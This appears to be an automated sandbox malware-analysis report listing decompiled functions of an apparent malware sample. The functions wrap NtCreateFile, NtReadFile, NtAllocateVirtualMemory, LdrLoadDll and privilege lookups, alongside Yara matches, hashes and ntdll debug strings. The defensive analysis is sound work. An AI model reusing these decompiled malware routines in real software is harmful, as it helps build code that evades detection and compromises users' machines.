                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                                                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                				void* _t18;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                
                                                				_t13 = _a4;
                                                				_t28 = _a4 + 0xc48;
                                                				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                				_t4 =  &_a40; // 0x413a41
                                                				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                                				return _t18;
                                                			}







                                                APIs
                                                • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: A:A
                                                • API String ID: 2738559852-2859176346
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
                                                				char* _v8;
                                                				struct _EXCEPTION_RECORD _v12;
                                                				struct _OBJDIR_INFORMATION _v16;
                                                				char _v536;
                                                				void* _t15;
                                                				struct _OBJDIR_INFORMATION _t17;
                                                				struct _OBJDIR_INFORMATION _t18;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                
                                                				_v8 =  &_v536;
                                                				_t15 = E0041AF80( &_v12, 0x104, _a8);
                                                				_t31 = _t30 + 0xc;
                                                				if(_t15 != 0) {
                                                					_t17 = E0041B3A0(__eflags, _v8);
                                                					_t32 = _t31 + 4;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						E0041B620( &_v12, 0);
                                                						_t32 = _t32 + 8;
                                                					}
                                                					_t18 = E00419730(_v8);
                                                					_v16 = _t18;
                                                					__eflags = _t18;
                                                					if(_t18 == 0) {
                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                						return _v16;
                                                					}
                                                					return _t18;
                                                				} else {
                                                					return _t15;
                                                				}
                                                			}














                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                				void* _t31;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t21;
                                                			}






                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                				void* _t21;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}






                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418720(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x409773
                                                				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}






                                                APIs
                                                • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                • Instruction ID: 3b26204582d5dd7030c9a573a1a5a39c6d6d610411b6e0fe2269be2f3466ebf6
                                                • Opcode Fuzzy Hash: db45eb921bfbdd039cee7a420ed994b46241c23369db4b3a407ff44e051c7392
                                                • Instruction Fuzzy Hash: 4290027120104402D20065AA5408656000597E0381F61D021A9014555EC6A58891B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 23%
                                                			E00407236(void* __eflags, intOrPtr* _a4, long _a12) {
                                                				void* _t5;
                                                				int _t6;
                                                				void* _t14;
                                                				void* _t16;
                                                				long _t18;
                                                				void* _t20;
                                                				int _t21;
                                                				void* _t23;
                                                
                                                				_pop(_t20);
                                                				asm("insd");
                                                				asm("frstor [ebx]");
                                                				asm("aas");
                                                				asm("adc [ebx-0x7a], ah");
                                                				if(__eflags >= 0) {
                                                					asm("rcl byte [edx-0x7d], 0xc6");
                                                					asm("sbb al, 0x56"); // executed
                                                					_t5 = E00409B50(__eflags); // executed
                                                					_t6 = E00413E60(_t20, _t5, 0, 0, 0xc4e7b6d6);
                                                					_t21 = _t6;
                                                					__eflags = _t21;
                                                					if(_t21 != 0) {
                                                						_t18 = _a12;
                                                						_t6 = PostThreadMessageW(_t18, 0x111, 0, 0); // executed
                                                						__eflags = _t6;
                                                						if(__eflags == 0) {
                                                							_t6 =  *_t21(_t18, 0x8003, _t23 + (E004092B0(__eflags, 1, 8) & 0x000000ff) - 0x40, _t6);
                                                						}
                                                					}
                                                					return _t6;
                                                				} else {
                                                					_push(_t23);
                                                					_t16 = E00419A00(_t14);
                                                					if(_t16 == 0 || _t16 == 0x33333333) {
                                                						__eflags = 0;
                                                						return 0;
                                                					} else {
                                                						return  *_a4 + _t16;
                                                					}
                                                				}
                                                			}












                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 3333
                                                • API String ID: 1836367815-2924271548
                                                • Opcode ID: 3bd7e29bbea837acbc421b2fdf2eba9d724bddffdfd8f32bf4844cfc834c245e
                                                • Instruction ID: 42233abdd107220d8035a8c7f7fe94cf6866f68173efa0fd849e36a6436a6306
                                                • Opcode Fuzzy Hash: 3bd7e29bbea837acbc421b2fdf2eba9d724bddffdfd8f32bf4844cfc834c245e
                                                • Instruction Fuzzy Hash: 2C01FC31B8426536EA2565985D42FBA77584F41B25F08456FFE08FA2C1D568BC0142EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID: @P
                                                • API String ID: 3899507212-4139428406
                                                • Opcode ID: ed68b200471594f1a20a47c205e6ecf4ca676beed89af90702fc053705e51577
                                                • Instruction ID: 31ebf812e3b37ec9ca67b9192a4eea9a6fe0cacc196ccdc2d4ced1d8e5b9e247
                                                • Opcode Fuzzy Hash: ed68b200471594f1a20a47c205e6ecf4ca676beed89af90702fc053705e51577
                                                • Instruction Fuzzy Hash: 6C01DFB52002496FCB14DF58DC90EEB77A9AF89318F00851AFD4893342C634E855CBF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                				void* _t10;
                                                				void* _t15;
                                                
                                                				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                				_t6 =  &_a8; // 0x413546
                                                				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                				return _t10;
                                                			}






                                                APIs
                                                • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: F5A
                                                • API String ID: 1279760036-683449296
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 55%
                                                			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				intOrPtr* _t13;
                                                				int _t14;
                                                				long _t21;
                                                				intOrPtr _t23;
                                                				intOrPtr* _t24;
                                                				void* _t25;
                                                				void* _t29;
                                                
                                                				_t29 = __eflags;
                                                				_v68 = 0;
                                                				E0041A150( &_v67, 0, 0x3f);
                                                				E0041AD30( &_v68, 3);
                                                				_t23 = _a4;
                                                				asm("rcl byte [edx-0x7d], 0xc6");
                                                				asm("sbb al, 0x56"); // executed
                                                				_t12 = E00409B50(_t29); // executed
                                                				_t13 = E00413E60(_t23, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t24 = _t13;
                                                				if(_t24 != 0) {
                                                					_t21 = _a8;
                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                					_t31 = _t14;
                                                					if(_t14 == 0) {
                                                						_t14 =  *_t24(_t21, 0x8003, _t25 + (E004092B0(_t31, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                					}
                                                					return _t14;
                                                				}
                                                				return _t13;
                                                			}














                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 5d3c49ca205283dccf914e55f78b1880c14ba53bb6022647faf82628d961ab79
                                                • Instruction ID: a1518626d2bf0556b071064e1f65b08c73a696c2ec80a5bc641cebfa84e51dfc
                                                • Opcode Fuzzy Hash: 5d3c49ca205283dccf914e55f78b1880c14ba53bb6022647faf82628d961ab79
                                                • Instruction Fuzzy Hash: 5BE022B42042152BDB08DF1A8D85EBB7BA9EF81310F14895EFC899B203C034E80587B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                				char _t10;
                                                				void* _t15;
                                                
                                                				_t3 = _a4 + 0xc74; // 0xc74
                                                				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}






                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418940(intOrPtr _a4, int _a8) {
                                                				void* _t10;
                                                
                                                				_t5 = _a4;
                                                				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                				ExitProcess(_a8);
                                                			}





                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c39b2336a2e4710c3ca4b9299de3defe155f02af67e87e3e63eaa70de0e24b5e
                                                • Instruction ID: f781954be2297d9b0edce2cd1316ec69c8dfbef58d2a3cd7478726b3d5bb8dab
                                                • Opcode Fuzzy Hash: c39b2336a2e4710c3ca4b9299de3defe155f02af67e87e3e63eaa70de0e24b5e
                                                • Instruction Fuzzy Hash: CAB09B719014C5C5D711D7714608727790077D0741F26C062D1030655A4778C491F6B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                • This failed because of error %Ix., xrefs: 00B4B446
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B4B2DC
                                                • *** enter .exr %p for the exception record, xrefs: 00B4B4F1
                                                • write to, xrefs: 00B4B4A6
                                                • The resource is owned shared by %d threads, xrefs: 00B4B37E
                                                • <unknown>, xrefs: 00B4B27E, 00B4B2D1, 00B4B350, 00B4B399, 00B4B417, 00B4B48E
                                                • The instruction at %p referenced memory at %p., xrefs: 00B4B432
                                                • The instruction at %p tried to %s , xrefs: 00B4B4B6
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B4B53F
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B4B484
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B4B38F
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B4B323
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B4B305
                                                • The resource is owned exclusively by thread %p, xrefs: 00B4B374
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00B4B2F3
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B4B3D6
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B4B39B
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 00B4B352
                                                • read from, xrefs: 00B4B4AD, 00B4B4B2
                                                • *** enter .cxr %p for the context, xrefs: 00B4B50D
                                                • The critical section is owned by thread %p., xrefs: 00B4B3B9
                                                • an invalid address, %p, xrefs: 00B4B4CF
                                                • a NULL pointer, xrefs: 00B4B4E0
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 00B4B48F
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B4B314
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B4B47D
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B4B476
                                                • *** then kb to get the faulting stack, xrefs: 00B4B51C
                                                • Go determine why that thread has not released the critical section., xrefs: 00B4B3C5
                                                • *** Inpage error in %ws:%s, xrefs: 00B4B418
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                • API String ID: 0-108210295
                                                • Opcode ID: 19fac94b00d31550df62527cca4df5091b64f6bdbeda23c53f0a10780fc1e9d4
                                                • Instruction ID: 1b7ba72583b4613e892393c43a27cb057c0761abd619c0923ef687f432768d7b
                                                • Opcode Fuzzy Hash: 19fac94b00d31550df62527cca4df5091b64f6bdbeda23c53f0a10780fc1e9d4
                                                • Instruction Fuzzy Hash: 2D81F275A40210FBCB21AA059C8AE7B3BA5EF56B51F4044C4F2086B2A7D371CE11EB72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E00B51C06() {
                                                				signed int _t27;
                                                				char* _t104;
                                                				char* _t105;
                                                				intOrPtr _t113;
                                                				intOrPtr _t115;
                                                				intOrPtr _t117;
                                                				intOrPtr _t119;
                                                				intOrPtr _t120;
                                                
                                                				_t105 = 0xa748a4;
                                                				_t104 = "HEAP: ";
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E00A9B150();
                                                				} else {
                                                					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				_push( *0xb8589c);
                                                				E00A9B150("Heap error detected at %p (heap handle %p)\n",  *0xb858a0);
                                                				_t27 =  *0xb85898; // 0x0
                                                				if(_t27 <= 0xf) {
                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M00B51E96))) {
                                                						case 0:
                                                							_t105 = "heap_failure_internal";
                                                							goto L21;
                                                						case 1:
                                                							goto L21;
                                                						case 2:
                                                							goto L21;
                                                						case 3:
                                                							goto L21;
                                                						case 4:
                                                							goto L21;
                                                						case 5:
                                                							goto L21;
                                                						case 6:
                                                							goto L21;
                                                						case 7:
                                                							goto L21;
                                                						case 8:
                                                							goto L21;
                                                						case 9:
                                                							goto L21;
                                                						case 0xa:
                                                							goto L21;
                                                						case 0xb:
                                                							goto L21;
                                                						case 0xc:
                                                							goto L21;
                                                						case 0xd:
                                                							goto L21;
                                                						case 0xe:
                                                							goto L21;
                                                						case 0xf:
                                                							goto L21;
                                                					}
                                                				}
                                                				L21:
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E00A9B150();
                                                				} else {
                                                					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				_push(_t105);
                                                				E00A9B150("Error code: %d - %s\n",  *0xb85898);
                                                				_t113 =  *0xb858a4; // 0x0
                                                				if(_t113 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E00A9B150();
                                                					} else {
                                                						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E00A9B150("Parameter1: %p\n",  *0xb858a4);
                                                				}
                                                				_t115 =  *0xb858a8; // 0x0
                                                				if(_t115 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E00A9B150();
                                                					} else {
                                                						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E00A9B150("Parameter2: %p\n",  *0xb858a8);
                                                				}
                                                				_t117 =  *0xb858ac; // 0x0
                                                				if(_t117 != 0) {
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E00A9B150();
                                                					} else {
                                                						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					E00A9B150("Parameter3: %p\n",  *0xb858ac);
                                                				}
                                                				_t119 =  *0xb858b0; // 0x0
                                                				if(_t119 != 0) {
                                                					L41:
                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                						_push(_t104);
                                                						E00A9B150();
                                                					} else {
                                                						E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                					}
                                                					_push( *0xb858b4);
                                                					E00A9B150("Last known valid blocks: before - %p, after - %p\n",  *0xb858b0);
                                                				} else {
                                                					_t120 =  *0xb858b4; // 0x0
                                                					if(_t120 != 0) {
                                                						goto L41;
                                                					}
                                                				}
                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                					_push(_t104);
                                                					E00A9B150();
                                                				} else {
                                                					E00A9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                				}
                                                				return E00A9B150("Stack trace available at %p\n", 0xb858c0);
                                                			}












                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                Similarity
                                                • API ID:
